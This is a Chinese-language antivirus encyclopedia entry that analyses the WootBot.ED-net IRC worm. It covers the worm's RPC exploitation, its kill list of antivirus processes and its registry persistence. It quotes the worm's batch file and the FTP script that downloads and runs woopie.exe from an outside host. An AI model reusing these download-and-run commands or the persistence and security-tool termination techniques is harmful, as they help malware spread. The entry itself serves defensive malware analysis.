English Japanese Korea
FortiProtect >>> Encyclopedia >>> 病毒资料
  
深度分析
W32/WootBot.ED-net
概    述
病毒描述
最后更新:*
Dec 17 2004
捕获时间:*
Dec 10 2004
FortiGate能检测到的
病毒库版本*
FOS/V2.36: 4.527
FOS/V2.50: 4.527
FOS/V2.80: 4.527
病毒特点
威胁程度:* 1 2 3 4 5
病毒长度:* 86,466
病毒类型:* Worm
受影响系统*
TCP系统服务漏洞
MS-Windows
其它名称*
W32/Sdbot.worm.gen.y [McAfee]
 
 
 


表现特征
  • 防火墙可能会提示有感染性的文件 "Nvsc32.exe" 试图访问 Internet
  • 病毒文件图标是一个标准的可执行体
  • 病毒可能会使用 TCP 端口 135, 139, 445, 以及 6667 进行传输 - 被感染的主机可能会使用末端的端口比如 12045 或者 19859
  • 反病毒软件或者防火墙可能会没有提示的突然关闭
  • System32 目录发现 "Nvsc32.exe" 文件
 
攻击分析
这是一个32位的病毒,打包后长度为 86,466 字节。病毒通过一个已知的 RPC 漏洞进行传播,另外,病毒还会连接到 IRC 服务器等待恶意用户的指令。病毒会关闭一些工具程序以及一些重要的服务。

服务终止程序
当病毒被激活,则会使用 PSAPI.DLL 来识别以及关闭自身列表中的程序或服务。该列表内容 -

 
Common threat filenames
video.exe
norton123.exe
svchosting.exe
0x1fe.exe
inst.EXEexplore32.exe
winagent.exe
lssas.exe
lsass2.exe
rxb1ot.exe
serasa.exe
serasa.exe.a
novarg_upx.zip
photo.zip
opr0371I.js
change.exe
pic33.scr
winset32.exe
wuarclt.exe
Crypto3.jpg
Tcpview1.exe
Tcpview.exe
taskmgr1.exe
taskmg.exe
cmd2.exe
cmd1.exe
ad-watch.exe
expore.exe
CSSSS.exe
CSRSR.exe
CSRSRS.exe
smsss.exe
sub7.exe
jpg.exebot.exe
fbi.exe
wupdate.exe
phatbot.exe
agobot.exe
iexplorer.exe
windowsupdate.exe
gov.exe
bircd.exe
rbot.exe
spybot.exe
rxbot.exe
forbot.exe
i11r54n4.exe
irun4.exe
d3dupdate.exe
rate.exe
ssate.exe
winsys.exe
winupd.exe
SysMonXP.exe
bbeagle.exe
Penis32.exe
mscvb32.exe
sysinfo.exe

Utility applications or services
PandaAVEngine.exe
F-AGOBOT.EXE
HIJACKTHIS.EXE
wircd.exe
cmd.exe
regedit.exe
msconfig.exe
taskmgr.exe
zapro.EXE
vsmon.EXE
vshwin32.EXE
vbcmserv.EXE
sbserv.EXE
rtvscan.EXE
rapapp.EXE
pcscan.EXE
pccwin97.EXE
pccntmon.EXE
pavproxy.EXE
nvsvc32.EXE
ntrtscan.EXE
npscheck.EXE
notstart.EXE
lockdown2000.EXE
iamserv.EXE
iamapp.EXE
gbpoll.EXE
gbmenu.EXE
fsmb32.EXE
fsma32.EXE
fsm32.EXE
fsgk32.EXE
fsav32.EXE
fsaa.EXE
fnrb32.EXE
fih32.EXE
fch32.EXE
fameh32.EXE
f-stopw.EXE
defscangui.EXE
defalert.EXE
cpd.EXE
cleaner3.EXE
cleaner.EXE
ccPxySvc.EXE
ccEvtMgr.EXE
ccApp.EXE
blackd.EXE
avpm.EXE
avkwctl9.EXE
avkservice.EXE
avkpop.EXE
apvxdwin.EXE
agentw.EXE
ZONALM2601.EXE
CZAUINST.EXE
ZATUTOR.EXE
ZAPSETUP3001.EXE
ZAPRO.EXE
XPF202EN.EXE
WrCtrl.EXE
WrAdmin.EXE
_AVPM.EXE
_AVPCC.EXE
_AVP32.EXE
ZONEALARM.EXE

Internet 连接尝试
病毒会扫描随即 IP 地址的 TCP 端口 445 来发现可能的目标。它会发送一个 SYN 包到随即选择子网的 IP 地址。例如,如果被感染的主机 IP 地址为 10.10.18.185,病毒目标为 10.10.%random%.%random%,一些例子 -

10.10.1.240
10.10.25.13
10.10.69.53
10.10.17.119

等等。如果系统返回一个确认包[ACK],病毒则会以其为目标。病毒将会通过 RPC DCOM 漏洞来尝试获取远程主机权限。如果成功,则会创建一个名为 "c.bat" 的批处理文件,其内容为 -

@echo off
ftp -n -v -s:.pif
woopie.exe
del .pif
del /F c.bat
exit /y

以上命令则会进行 -

  • 开始一个 FTP[文件传输协议] 程序实例
  • 禁止服务器显示响应信息,阻止自动登录
  • 使用一个命名为 ".pif" 的脚本来处理登陆信息
    运行 "woopie.exe"
  • 删除 ftp 脚本文件 ".pif",并强制删除当前批处理文件
    推出命令行

 

FTP 的 ".pif" 脚本包含以下指令 -

open dra.chatcenter.nl 21
user ******* ******
binary
GET woopie.exe
bye

在上面的脚本中,用户名和密码信息显而易见。文件"woopie.exe"则使病毒的副本。如果 FTP 扫描开启,Fortigate 将会阻止任何传输。

跟随 Windows 系统启动
如果病毒运行,将会拷贝自己到硬盘驱动器 System32 目录下,并命名为 "Nvsc32.exe" 然后修改注册表信息 -

HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
"NvCplScan" = nvsc32.exe

HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Runonce
"NvCplScan" = nvsc32.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
"NvCplScan" = nvsc32.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce
"NvCplScan" = nvsc32.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"NvCplScan" = nvsc32.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
"NvCplScan" = nvsc32.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
"NvCplScan" = nvsc32.exe

另外,病毒会在 Windows NT/2000/XP 系统中创建一个服务,并设置注册表信息 -

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NVCPLSCAN\
"NextInstance" = 01, 00, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NVCPLSCAN\0000\
"Class" = LegacyDriver
"ClassGUID" = {8ECC055D-047F-11D1-A537-0000F8753ED1}
"ConfigFlags" = 00, 00, 00, 00
"DeviceDesc" = NvCplScan
"Legacy" = 01, 00, 00, 00
"Service" = NvCplScan

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NVCPLSCAN\0000\Control\
"*NewlyCreated*" = 00, 00, 00, 00
"ActiveService" = NvCplScan

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvCplScan\
"DeleteFlag" = 01, 00, 00, 00
"DisplayName" = NvCplScan
"ErrorControl" = 01, 00, 00, 00
"FailureActions" = (hex values)
"ImagePath" = "C:\WINNT\System32\nvsc32.exe" -netsvcs
"ObjectName" = LocalSystem
"Start" = 04, 00, 00, 00
"Type" = 20, 00, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvCplScan\Enum\
"0" = Root\LEGACY_NVCPLSCAN\0000
"Count" = 01, 00, 00, 00
"NextInstance" = 01, 00, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvCplScan\Security\
"Security" = (hex values)

IRC 服务器连接
病毒会绑定一个 TCP 端口然后尝试连接 IRC 服务器 'members.home.nl'。当连接成功后,病毒会等待恶意用户指令。

命令可能包含发送 flood 攻击(PING, HTTP, UDP, SYN),漏洞扫描(DCOM, NetBISO)以及其他指令。病毒还会作为 FTP 或者 HTTP 服务启动。

其他
病毒体内包含 'Woot' 信息。
 
处理方式
  • 阻止内部网和外部网络的 TCP 端口 135, 139, 445, 6667。
  • 确认已经安装了 Microsoft 最新的安全补丁。


 
 
网站指南  |  法律声明

     版权所有© 2003 美国飞塔有限公司